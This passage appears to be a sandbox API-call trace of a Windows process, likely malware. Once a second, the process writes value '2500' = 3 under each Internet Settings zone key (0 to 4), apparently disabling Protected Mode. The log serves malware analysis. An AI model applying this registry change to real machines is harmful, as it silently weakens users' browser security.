	[0093.541] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0093.541] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0093.541] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0093.541] RegCloseKey (hKey=0x248) returned 0x0
	[0093.541] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0093.542] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0093.542] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0093.542] RegCloseKey (hKey=0x248) returned 0x0
	[0093.542] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0093.542] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0093.542] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0093.542] RegCloseKey (hKey=0x248) returned 0x0
	[0093.542] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0093.542] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0093.542] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0093.542] RegCloseKey (hKey=0x248) returned 0x0
	[0093.542] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0093.542] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0093.542] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0093.542] RegCloseKey (hKey=0x248) returned 0x0
	[0093.542] Sleep (dwMilliseconds=0x3e8) 
	[0094.627] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0094.627] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0094.628] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0094.628] RegCloseKey (hKey=0x248) returned 0x0
	[0094.628] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0094.628] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0094.628] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0094.628] RegCloseKey (hKey=0x248) returned 0x0
	[0094.628] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0094.628] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0094.628] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0094.629] RegCloseKey (hKey=0x248) returned 0x0
	[0094.629] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0094.629] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0094.629] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0094.629] RegCloseKey (hKey=0x248) returned 0x0
	[0094.629] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0094.629] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0094.629] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0094.629] RegCloseKey (hKey=0x248) returned 0x0
	[0094.629] Sleep (dwMilliseconds=0x3e8) 
	[0095.715] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0095.715] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0095.716] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0095.716] RegCloseKey (hKey=0x248) returned 0x0
	[0095.716] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0095.716] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0095.716] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0095.716] RegCloseKey (hKey=0x248) returned 0x0
	[0095.716] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0095.716] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0095.716] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0095.716] RegCloseKey (hKey=0x248) returned 0x0
	[0095.716] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0095.716] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0095.716] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0095.716] RegCloseKey (hKey=0x248) returned 0x0
	[0095.717] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0095.717] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0095.717] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0095.717] RegCloseKey (hKey=0x248) returned 0x0
	[0095.717] Sleep (dwMilliseconds=0x3e8) 
	[0096.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0096.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0096.739] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0096.739] RegCloseKey (hKey=0x248) returned 0x0
	[0096.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0096.740] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0096.740] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0096.740] RegCloseKey (hKey=0x248) returned 0x0
	[0096.740] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0096.740] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0096.740] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0096.740] RegCloseKey (hKey=0x248) returned 0x0
	[0096.740] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0096.740] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0096.740] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0096.740] RegCloseKey (hKey=0x248) returned 0x0
	[0096.740] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0096.740] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0096.740] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0096.740] RegCloseKey (hKey=0x248) returned 0x0
	[0096.740] Sleep (dwMilliseconds=0x3e8) 
	[0097.800] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0097.800] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0097.801] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0097.801] RegCloseKey (hKey=0x248) returned 0x0
	[0097.801] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0097.801] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0097.801] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0097.801] RegCloseKey (hKey=0x248) returned 0x0
	[0097.801] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0097.801] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0097.801] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0097.801] RegCloseKey (hKey=0x248) returned 0x0
	[0097.801] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0097.801] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0097.801] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0097.801] RegCloseKey (hKey=0x248) returned 0x0
	[0097.801] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0097.801] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x248) returned 0x0
	[0097.801] RegSetValueExA (in: hKey=0x248, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0097.802] RegCloseKey (hKey=0x248) returned 0x0
	[0097.802] Sleep (dwMilliseconds=0x3e8) 
	[0098.883] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0098.883] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x36c) returned 0x0
	[0098.884] RegSetValueExA (in: hKey=0x36c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0098.884] RegCloseKey (hKey=0x36c) returned 0x0
	[0098.884] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0098.884] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x36c) returned 0x0
	[0098.884] RegSetValueExA (in: hKey=0x36c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0098.884] RegCloseKey (hKey=0x36c) returned 0x0
	[0098.884] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0098.884] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x36c) returned 0x0
	[0098.884] RegSetValueExA (in: hKey=0x36c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0098.884] RegCloseKey (hKey=0x36c) returned 0x0
	[0098.884] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0098.884] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x36c) returned 0x0
	[0098.884] RegSetValueExA (in: hKey=0x36c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0098.884] RegCloseKey (hKey=0x36c) returned 0x0
	[0098.884] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0098.884] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x36c) returned 0x0
	[0098.884] RegSetValueExA (in: hKey=0x36c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0098.885] RegCloseKey (hKey=0x36c) returned 0x0
	[0098.885] Sleep (dwMilliseconds=0x3e8) 
	[0099.973] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0099.973] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x394) returned 0x0
	[0099.973] RegSetValueExA (in: hKey=0x394, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0099.973] RegCloseKey (hKey=0x394) returned 0x0
	[0099.973] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0099.974] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x394) returned 0x0
	[0099.974] RegSetValueExA (in: hKey=0x394, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0099.974] RegCloseKey (hKey=0x394) returned 0x0
	[0099.974] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0099.974] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x394) returned 0x0
	[0099.974] RegSetValueExA (in: hKey=0x394, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0099.974] RegCloseKey (hKey=0x394) returned 0x0
	[0099.974] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0099.974] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x394) returned 0x0
	[0099.974] RegSetValueExA (in: hKey=0x394, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0099.974] RegCloseKey (hKey=0x394) returned 0x0
	[0099.974] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0099.974] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x394) returned 0x0
	[0099.974] RegSetValueExA (in: hKey=0x394, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0099.974] RegCloseKey (hKey=0x394) returned 0x0
	[0099.974] Sleep (dwMilliseconds=0x3e8) 
	[0100.999] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0100.999] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x478) returned 0x0
	[0101.000] RegSetValueExA (in: hKey=0x478, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0101.000] RegCloseKey (hKey=0x478) returned 0x0
	[0101.000] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0101.000] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x478) returned 0x0
	[0101.000] RegSetValueExA (in: hKey=0x478, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0101.000] RegCloseKey (hKey=0x478) returned 0x0
	[0101.000] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0101.000] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x478) returned 0x0
	[0101.000] RegSetValueExA (in: hKey=0x478, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0101.000] RegCloseKey (hKey=0x478) returned 0x0
